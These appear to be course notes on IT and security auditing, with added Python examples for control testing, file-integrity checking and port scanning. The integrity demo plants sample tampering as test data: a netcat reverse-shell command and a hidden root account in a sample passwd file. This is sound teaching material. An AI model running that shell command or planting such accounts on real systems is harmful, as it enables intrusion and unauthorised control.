7-Oct-15 System Auditing

AUDITING
Auditing is a systematic process of objectively obtaining and evaluating evidence regarding assertions about economic actions and events, to ascertain the degree of correspondence between those assertions and established criteria, and communicating the results to interested users.

Types of Audits
- Financial Audit
- Operational Audit
- Compliance Audit
- Fraud Audit
- IT Audit
- Security Audit
An audit can be performed internally or externally (for example by certified public accountants).

IT Audit An information technology audit, or information systems audit, is an examination of the controls within an Information technology (IT) infrastructure. An IT audit is the process of collecting and evaluating evidence of an organization's information systems, practices, and operations.

IT Audit
The evaluation of the obtained evidence determines whether the information systems are safeguarding assets, maintaining data integrity, and operating effectively and efficiently to achieve the organization's goals or objectives. This is becoming increasingly important because accounting data and the processes that produce it are now embedded in computer-based information systems.

IT Audit  Subject to ethics, guidelines, and standards of the profession (if certified)  CISA  Most closely associated with ISACA  Joint with internal, external, and fraud audits  Scope of IT audit coverage is increasing  Characterized by CAATTs  IT governance as part of corporate governance

Stages of IT Audit
1. Planning
2. Obtaining evidence: tests of controls, substantive testing, CAATTs, analytical procedures
3. Ascertaining reliability: materiality
4. Communicating results: audit opinion

IT Audit Approach
Gather information and plan:
- Knowledge of the business and industry
- Prior year's audit results
- Recent financial information
- Regulatory statutes
- Inherent risk assessment
Obtain an understanding of internal control:
- Control environment
- Control procedures
- Control risk assessment
- Detection risk assessment
- Total risk

IT Audit Approach
Perform compliance tests:
- Test policies and procedures
- Test segregation of duties
Perform substantive tests:
- Analytical procedures
- Detailed tests of account balances
- Other substantive audit procedures
Conclude the audit:
- Create recommendations
- Write the audit report

Tests performed
Compliance testing: determines whether internal controls are being applied in the manner described in the documentation and in accordance with management's intent.
Substantive testing: determines the integrity of the actual processing. Usually done by re-performing the processing on a sample of the data and checking whether the same result is obtained.
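The two kinds of test above, written out as an added example (this code is not from the slides): the compliance test checks a segregation-of-duties control (the person who enters a journal entry must not also approve it), and the substantive test re-performs the posting of a sample journal and compares the recomputed balances with the balances the system reports, flagging any difference at or above a materiality threshold. The journal lines, reported balances and the 100.00 materiality figure are constructed sample data, not figures from the original page.

```python
from collections import defaultdict
from dataclasses import dataclass
from decimal import Decimal
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Transaction:
    tid: str
    account: str
    amount: Decimal      # signed: debit positive, credit negative
    entered_by: str
    approved_by: str


# Constructed sample journal extract (hypothetical data for the example).
JOURNAL: List[Transaction] = [
    Transaction("T1", "1000-Cash", Decimal("1500.00"), "alice", "bob"),
    Transaction("T2", "1000-Cash", Decimal("-250.00"), "alice", "alice"),  # SoD violation
    Transaction("T3", "1200-AR", Decimal("900.00"), "carol", "bob"),
    Transaction("T4", "1200-AR", Decimal("-900.00"), "carol", "dave"),
    Transaction("T5", "1000-Cash", Decimal("75.00"), "dave", "bob"),
]

# Constructed balances "reported" by the system under audit for the same period.
REPORTED_BALANCES: Dict[str, Decimal] = {
    "1000-Cash": Decimal("1375.00"),   # 50.00 above recomputed; below materiality
    "1200-AR": Decimal("450.00"),      # recomputed is 0.00; material difference
}

MATERIALITY = Decimal("100.00")   # assumed threshold for this example


def compliance_test_segregation(journal: List[Transaction]) -> List[str]:
    """Test of control: entries where the same person entered and approved.

    Returns the transaction ids that breach the segregation-of-duties control.
    """
    return [t.tid for t in journal if t.entered_by == t.approved_by]


def substantive_reperformance(
    journal: List[Transaction],
    reported: Dict[str, Decimal],
    materiality: Decimal,
) -> Tuple[Dict[str, Decimal], Dict[str, Decimal]]:
    """Substantive test: re-post the journal and compare with reported balances.

    Returns (recomputed balances, exceptions), where exceptions maps each
    account whose reported-minus-recomputed difference is material to that
    difference. Decimal is used so the re-performance is exact to the cent.
    """
    recomputed: Dict[str, Decimal] = defaultdict(lambda: Decimal("0.00"))
    for t in journal:
        recomputed[t.account] += t.amount

    exceptions: Dict[str, Decimal] = {}
    for account in sorted(set(recomputed) | set(reported)):
        diff = reported.get(account, Decimal("0.00")) - recomputed.get(account, Decimal("0.00"))
        if abs(diff) >= materiality:
            exceptions[account] = diff
    return dict(recomputed), exceptions


def run_tests() -> Dict[str, object]:
    """Run both tests over the sample data and return the findings."""
    sod_breaches = compliance_test_segregation(JOURNAL)
    recomputed, exceptions = substantive_reperformance(JOURNAL, REPORTED_BALANCES, MATERIALITY)
    return {"sod_breaches": sod_breaches, "recomputed": recomputed, "exceptions": exceptions}


if __name__ == "__main__":
    for key, value in run_tests().items():
        print(f"{key}: {value}")
```

A difference below materiality (the 50.00 on cash) is still an observation worth noting in the working papers; it simply does not, on its own, change the audit opinion. The control breach on T2 is reported regardless of amount, because a compliance test is about whether the control operated, not about the size of the transaction.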

Security Audit
A systematic, measurable technical assessment of:
- how the organization's security policy is employed at a specific site
- how effectively the entity being assessed meets specific security objectives

Assessment Methodology
Should be repeatable and documented. Divided into three phases:
1. Planning
   - Set goals, scope, timeline, responsibilities, resources, deliverables
   - Collect information: assets to be assessed, threats against those assets, security controls that mitigate the risk
2. Execution
   - Validate controls and identify vulnerabilities
3. Post-execution

Assessment Methodology
Post-execution:
- Analyse the identified vulnerabilities
- Determine the root cause
- Recommend mitigation methods
- Write the final report

Assessment methods
- Examine/review
- Technical investigation/assessment
- Interview

Review techniques
- Documentation review: policies, procedures
- Log review
- Rule set review: router, firewall, IDS, etc.
- System configuration review
- Network sniffing: network traffic
- File integrity checking
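File integrity checking, the last review technique above, as an added example (not code from the slides): a baseline of SHA-256 digests is taken over a directory tree, and a later verification run reports files that were added, removed, or whose content changed. The demo builds a throwaway directory with constructed sample files, so everything it hashes is made up for the example; the file names (bin/app, etc/config, etc/passwd, bin/backdoor) are hypothetical.

```python
import hashlib
import os
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_file(path: Path, chunk_size: int = 65536) -> str:
    """SHA-256 of a file's contents, read in chunks so large files are fine."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its digest.

    Content hashes are used rather than mtime/size, since an attacker who can
    change a file can usually also restore its timestamp.
    """
    baseline: Dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            baseline[path.relative_to(root).as_posix()] = hash_file(path)
    return baseline


def verify(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the current tree against a stored baseline."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(current) & set(baseline) if current[p] != baseline[p]),
    }


def demo() -> Dict[str, List[str]]:
    """Create a constructed tree, baseline it, tamper with it, and verify."""
    root = Path(tempfile.mkdtemp(prefix="fic-"))
    try:
        files = {  # constructed sample content, not real system files
            "bin/app": b"#!/bin/sh\necho app\n",
            "etc/config": b"listen = 127.0.0.1\n",
            "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
        }
        for rel, content in files.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(content)

        baseline = build_baseline(root)

        # Simulated tampering: new account appended, config deleted, file dropped in.
        (root / "etc/passwd").write_bytes(files["etc/passwd"] + b"eve:x:0:0::/:/bin/sh\n")
        (root / "etc/config").unlink()
        (root / "bin/backdoor").write_bytes(b"#!/bin/sh\nnc -e /bin/sh 10.0.0.1 4444\n")

        return verify(root, baseline)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In a real audit the baseline must be stored somewhere the audited host cannot write to (an offline copy or a signed file on the auditor's machine); a baseline that lives next to the files it protects can be regenerated by whoever altered them.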

Technical assessment techniques
- Network discovery
- Network port and service identification
- Vulnerability scanning
- Wireless scanning, etc.
- Password cracking
- Penetration testing
- Social engineering
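Network port and service identification, from the list above, as an added example (not code from the slides): a TCP connect scan over a set of ports, with a banner grab on each open port and a small prefix table that maps the banner to a service name. So that it runs offline, the demo starts its own loopback listener that answers with a constructed SSH-style banner; the banner text and the signature table are assumptions for the example, not captured from a real host. Only scan hosts that are inside the agreed assessment scope.

```python
import socket
import threading
from typing import Dict, Iterable, Tuple

# Constructed banner prefixes -> service guess (illustrative, not exhaustive).
BANNER_SIGNATURES: Tuple[Tuple[str, str], ...] = (
    ("SSH-", "ssh"),
    ("220 ", "smtp-or-ftp"),
    ("HTTP/", "http"),
    ("+OK", "pop3"),
)


def identify_service(banner: str) -> str:
    """Guess the service from the first bytes it sends after connect."""
    for prefix, name in BANNER_SIGNATURES:
        if banner.startswith(prefix):
            return name
    return "unknown"


def scan_ports(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, str]:
    """TCP connect scan. Returns {open_port: banner}; closed/filtered ports are omitted.

    A connect scan completes the handshake, so it shows up in the target's
    logs; that is acceptable (and often desirable) in an authorised audit.
    """
    open_ports: Dict[int, str] = {}
    for port in ports:
        try:
            sock = socket.create_connection((host, port), timeout=timeout)
        except OSError:
            continue  # refused, filtered, or timed out
        with sock:
            sock.settimeout(timeout)
            try:
                banner = sock.recv(256).decode("utf-8", "replace").strip()
            except OSError:  # socket.timeout is an OSError: service waits for client to speak
                banner = ""
        open_ports[port] = banner
    return open_ports


def start_fake_service(banner: bytes) -> int:
    """Loopback listener that sends `banner` to every client; returns its port.

    Stands in for a real host so the example runs without network access.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def demo() -> Dict[int, Tuple[str, str]]:
    """Scan the fake service and return {port: (banner, identified service)}."""
    port = start_fake_service(b"SSH-2.0-ExampleSSH_1.0\r\n")  # constructed banner
    found = scan_ports("127.0.0.1", [port])
    return {p: (b, identify_service(b)) for p, b in found.items()}


if __name__ == "__main__":
    for port, (banner, service) in demo().items():
        print(f"{port}/tcp open  {service:<12} {banner}")
```

Banner matching is a first approximation: services that wait for the client to speak first (HTTP, for instance) return an empty banner here and need a protocol-specific probe, and a banner can be changed by the administrator, so it should be treated as a hint to confirm rather than as proof of what is running.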

Talk to / interview people
- Have they read the security policy?
- What can and can't they do, in their own words?
- Could they get root / system privileges?
- What are the systems used for?
- What are the critical systems?
- How do they view the security audit?

Terminology
- CAATT: Computer-Assisted Audit Tools and Techniques
- ACL: Audit Command Language
- IDEA: Interactive Data Extraction and Analysis
Reference on security audit: NIST SP 800-115, Technical Guide to Information Security Testing and Assessment